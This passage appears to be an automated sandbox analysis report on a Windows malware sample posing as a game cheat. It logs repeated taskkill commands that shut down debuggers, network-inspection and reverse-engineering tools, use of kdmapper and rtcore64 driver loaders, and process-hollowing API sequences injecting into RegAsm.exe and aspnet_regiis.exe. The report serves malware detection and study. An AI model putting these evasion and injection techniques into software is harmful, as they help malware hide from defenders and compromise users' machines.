                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Edge\msedge.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C483284 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF60C483284
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C483728 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF60C483728
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeCode function: 0_2_00007FF60C4838D0 SetUnhandledExceptionFilter,0_2_00007FF60C4838D0
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A953B2A8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,28_2_00007FF6A953B2A8
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A953B480 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,28_2_00007FF6A953B480
                                Source: C:\Windows\Speech\imxyvi.exeCode function: 28_2_00007FF6A953B660 SetUnhandledExceptionFilter,28_2_00007FF6A953B660
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00EDF838
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDF9D5 SetUnhandledExceptionFilter,52_2_00EDF9D5
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EDFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,52_2_00EDFBCA
                                Source: C:\Windows\Speech\kdmapper.exeCode function: 52_2_00EE8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,52_2_00EE8EBD
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06CB42 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_6D06CB42
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D06C617 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,65_2_6D06C617
                                Source: C:\Windows\Speech\rtcore64.exeCode function: 65_2_6D070ADC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,65_2_6D070ADC
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: page read and write | page guardJump to behavior

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Windows\Speech\physmeme.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and writeJump to behavior
                                Source: C:\Windows\Speech\rtcore64.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe base: 380000 protect: page execute and read and write
                                Source: C:\Windows\Speech\physmeme.exeCode function: 36_2_02AE2129 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessA,CreateProcessA,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,36_2_02AE2129
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T Jump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Users\user\Desktop\UY9hUZn4CQ.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Ida64.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im OllyDbg.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg64.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im Dbg32.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq charles*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq ida*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerUI.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im HTTPDebuggerSvc.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im EpicGamesLauncher.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /f /im FortniteClient-Win64-Shipping.exe
